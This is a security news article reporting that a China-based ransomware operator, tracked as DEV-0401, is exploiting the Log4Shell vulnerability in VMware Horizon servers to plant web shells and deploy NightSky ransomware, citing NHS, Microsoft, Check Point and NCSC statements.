The Log4j vulnerability continues to be exploited by threat actors and a new ransomware group has been identified actively targeting Log4Shell vulnerabilities in the VMware Horizon servers.
According to a 5 January 2022 update from the UK’s National Health Service (NHS), the attackers are trying to establish web shells, that can be used to carry out the deployment of malicious software, data exfiltration and the deployment of ransomware. VMware Horizon is a virtual desktop provider which leverages the hybrid cloud.
On 11 January 2022, Microsoft provided an update on Log4j vulnerabilities and noted, “as early as January 4, attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon”.
“Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware,” the Microsoft statement said.
NightSky ransomware
The NightSky ransomware was first discovered in December 2021 by MalwareHunterTeam.
The attacks are being performed by a China-based ransomware operator that Microsoft says it is tracking as DEV-0401.
“DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo and Rook, and has similarly exploited internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).”
Based on Microsoft’s analysis the attackers are using command and control (CnC) servers that spoof legitimate domains.
[inlinead-1]
The NHS statement says that attackers are leveraging the vulnerability to “use the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service”.
Log4j impact continues
Since being uncovered in early December 2021 threat actors have taken advantage of the opportunities presented by the Log4J vulnerability.
According to Check Point Research (CPR), Q4 of 2021 saw an all-time peak in weekly cyber-attacks with CPR counting more than 900 attacks per organization, largely due to the Log4j vulnerability.
Ransomware has been identified as a major issue for those who have not successfully patched the vulnerability.
In December, the UK’s National Cyber Security Centre said: “As the situation evolves, we expect attacks to become more targeted. Ransomware groups may look to use Log4Shell as a method of illicit entry into organizations. Once access is secured, threat actors will then look to obtain further access in order to be able to ransom the whole organization in a highly impactful way.”